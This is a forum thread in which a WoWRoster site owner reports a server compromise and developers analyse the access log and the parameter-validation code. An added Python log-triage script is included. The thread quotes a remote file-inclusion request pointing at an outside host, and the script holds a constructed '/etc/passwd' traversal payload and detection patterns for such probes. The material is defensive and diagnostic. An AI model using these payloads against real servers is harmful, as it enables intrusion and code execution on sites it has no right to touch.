Big issue!! trojan access

Postby maqjav » Fri May 08, 2009 3:32 pm

Hello guys.

Last month I was attacked by someone accessing my server through the roster.

I've been speaking with my server support and they sent me the log.
Here it is:

89.108.73.84 - - [08/Apr/2009:17:26:49 +0200] "GET
/roster/index.php?p=http://www.wizard.com.br/id.txt??? HTTP/1.1" 200 153
herederosdethrall.es "-" "Mozilla
/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10)
Gecko/20050717 Firefox/1.0.6" "-"

Someone was able to access my files and change all the "index.*" files, adding a hidden iframe. This iframe installs a trojan on your system that opens pop-ups continuously on every web site you visit.
Not only that, the pop-ups install new trojans more dangerous than the first one. My updated antivirus (McAfee VirusScan) didn't detect them.
In fact I got a trojan that accessed my router and changed my DNS servers in the end.
You can imagine what will happen if it happens in a house where they don't know about computers.

Be careful with that and just find a solution to stop this illegal access.

Postby zanix » Fri May 08, 2009 4:26 pm

Roster doesn't accept any characters for the p value from the URL except a-z 1-9 _ -

Roster dies and outputs an invalid message
// cmslink function to resolve SEO linking etc.
parse_params();

// --[ Determine the module request ]--
if( isset($_GET[ROSTER_PAGE]) && !empty($_GET[ROSTER_PAGE]) )
{
    $page = $_GET[ROSTER_PAGE];
}
elseif( !strpos($this->config['default_page'], '&') )
{
    $page = $this->config['default_page'];
}
else
{
    // --[ Insert directly into GET request ]--
    // (note: 'conf' here but 'config' above, as posted)
    list($page, $gets) = explode('&', $this->conf['default_page'], 2);
    foreach( explode('&', $gets) as $get )
    {
        list($key, $value) = explode('=', $get, 2);
        $_GET[$key] = $value;
    }
}

define('ROSTER_PAGE_NAME', $page);

$this->pages = explode('-', $page);

// --[ We only accept certain characters in our page ]--
if( preg_match('/[^a-zA-Z0-9_-]/', ROSTER_PAGE_NAME) )
{
    roster_die($this->locale->act['invalid_char_module'], $this->locale->act['roster_error']);
}



I would like to know any more information you have about this.

Postby maqjav » Sat May 09, 2009 10:09 am

That's everything they could tell me.
I asked them about more information, but they only found that.

I was looking up more information about this kind of attack, and it seems there is a possibility that you can get a trojan or something on your computer that finds your FTP passwords and accesses your server, infecting as many files as it wants.

I will keep asking my support to find more information about it.

Thank you anyway, I'll give you news.

Postby PleegWat » Sat May 09, 2009 12:16 pm

I can't find any code that is likely to cause the bug before the code zanix pasted. It could be an issue in the preg_match in zanix's snippet, in which case it is a PHP bug. For any others looking into this:

89.108.73.84 - - [08/Apr/2009:17:26:49 +0200] "GET
/roster/index.php?p=http://www.wizard.com.br/id.txt??? HTTP/1.1" 200 153
herederosdethrall.es "-" "Mozilla
/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10)
Gecko/20050717 Firefox/1.0.6" "-"


The columns are, as far as I can make out:

IP address
    89.108.73.84

unknown
    -

unknown
    -

Timestamp
    [08/Apr/2009:17:26:49 +0200]

Method
    GET

URL path
    /roster/index.php?p=http://www.wizard.com.br/id.txt???
Note: The last 3 question marks are likely to be substituted control codes

Protocol
    HTTP/1.1

Return status
    200
Normal. Indicates the webserver thinks the request was completed successfully. Roster unfortunately does not exit with a special exit status in case of errors (because IIS servers then substitute their own error page rather than the one the PHP script returns).

Unknown, but probably VHost
    herederosdethrall.es

unknown
    -

User-Agent
    Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6
Suggests an ancient Firefox (1.0.6) on a Mac. Likely to be faked. I haven't checked if that Firefox version really returns that user agent.

unknown
    -

I'm not sure what the first two or the last dash mean. The one between vhost and user agent I suspect to be referer, from my own webserver logs.
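
The following is an added example, not WoWRoster code and not posted by anyone in this thread. It covers two things discussed above: zanix's character allowlist for the page parameter (the same `[^a-zA-Z0-9_-]` class, ported to Python), and PleegWat's column-by-column reading of the log line, turned into a parser that runs over constructed sample lines and flags query values that look like file-inclusion probes (URL schemes, PHP stream wrappers, NUL bytes). Assumptions not on the page: the field "153" between the status and the vhost is treated as bytes sent, which is where Apache's standard formats put it, and the trailing quoted "-" is kept as an unknown field; the second and third log lines are made up (TEST-NET addresses) for contrast. Nothing here says whether the `p=http://...` request actually reached an include on the victim's host; it only shows what the allowlist rejects and what to look for in the rest of the log.

```python
"""Added example (not WoWRoster code): parse the Apache access-log line quoted in
the thread, flag query values that look like file-inclusion probes, and apply the
same character allowlist WoWRoster's preg_match enforces on its page parameter."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log. Line 1 is the request from the thread re-joined onto one
# line; lines 2 and 3 are made up (TEST-NET addresses) for contrast.
SAMPLE_LOG = "\n".join([
    '89.108.73.84 - - [08/Apr/2009:17:26:49 +0200] '
    '"GET /roster/index.php?p=http://www.wizard.com.br/id.txt??? HTTP/1.1" 200 153 '
    'herederosdethrall.es "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; '
    'rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "-"',
    '198.51.100.7 - - [08/Apr/2009:17:30:02 +0200] '
    '"GET /roster/index.php?p=guild-roster HTTP/1.1" 200 8812 '
    'herederosdethrall.es "-" "Mozilla/5.0" "-"',
    '203.0.113.9 - - [08/Apr/2009:17:31:40 +0200] '
    '"GET /roster/index.php?p=../../../../etc/passwd%00 HTTP/1.1" 200 153 '
    'herederosdethrall.es "-" "curl/7.19.5" "-"',
])

# Field layout as PleegWat read it: host, ident, user, time, request, status,
# then (assumption) bytes sent, vhost, referer, user-agent and a trailing
# unknown quoted field. The hosting provider's real LogFormat is not on the page.
LOG_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) (?P<vhost>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)" "(?P<extra>[^"]*)"$'
)
REQUEST_RE = re.compile(r'^(\S+) (.*) (\S+)$')

# Same character class as WoWRoster's  preg_match('/[^a-zA-Z0-9_-]/', ...)
PAGE_DENY_RE = re.compile(r'[^a-zA-Z0-9_-]')

# Values no page name ever needs: URL schemes and PHP stream wrappers (remote
# file inclusion), or a NUL byte, which attackers use to cut off a suffix the
# script appends to the include path. A trailing '?' serves the same purpose for
# http:// payloads, since whatever follows becomes the remote server's query string.
PROBE_RE = re.compile(r'^(?:https?|ftp|php|data|expect)://|%00|\x00', re.IGNORECASE)


def parse_line(line):
    """Split one access-log line into a dict; returns None if it does not fit the layout."""
    m = LOG_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    rm = REQUEST_RE.match(rec["request"])
    rec["method"], rec["path"], rec["protocol"] = rm.groups() if rm else (None, rec["request"], None)
    # parse_qsl percent-decodes, so %00 arrives as a real NUL byte
    rec["params"] = dict(parse_qsl(urlsplit(rec["path"]).query, keep_blank_values=True))
    return rec


def roster_accepts_page(value):
    """Mirror of the roster check: accept only if no character falls outside the allowlist."""
    return PAGE_DENY_RE.search(value) is None


def suspicious_params(params):
    """Names of query parameters whose values look like inclusion payloads."""
    return sorted(name for name, value in params.items() if PROBE_RE.search(value))


def triage(log_text):
    """Classify every parseable line. The status code is useless here (Roster answers
    200 even for its own error page), so the verdict comes from the parameters."""
    rows = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        page = rec["params"].get("p", "")
        if suspicious_params(rec["params"]):
            verdict = "inclusion-probe"
        elif page and not roster_accepts_page(page):
            verdict = "rejected-page-value"   # Roster would roster_die() on this
        else:
            verdict = "ok"
        rows.append({"host": rec["host"], "page": page, "bytes": rec["bytes"], "verdict": verdict})
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_LOG):
        print(f'{row["host"]:<15} {row["verdict"]:<20} {row["bytes"]:>6}B  p={row["page"]!r}')
```

To use it on a real file, feed the log text to `triage()` and look at every row that is not "ok"; since the status is 200 either way, the bytes column is the only hint in the log itself whether the response was the roster's short error page or a full render, and the only way to know what the script did with the value is the code path zanix pasted, not the log.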

Postby PleegWat » Sat May 09, 2009 12:26 pm

Oh, and can you please post:

- OS, with version
- HTTP server, with version
You can find this information in rosterdiag under 'Basic server info'

- PHP version
- Whether the safe_mode, open_basedir, allow_url_fopen, and file_upload settings are on or off.
You can find this information in rosterdiag under 'PHP Settings'

Postby maqjav » Sat May 09, 2009 9:12 pm

Here it is...

Basic Server Info
OS Linux infong 2.4 #1 SMP Tue Dec 18 22:34:10 UTC 2007 i686 GNU/Linux
Server Software Apache
MySQL Version 5.0.67-log

PHP Settings
PHP Version 5.2.9
PHP API Type cgi
safe_mode Off
open_basedir Off
allow_url_fopen Off
file_uploads On
upload_max_filesize 20M
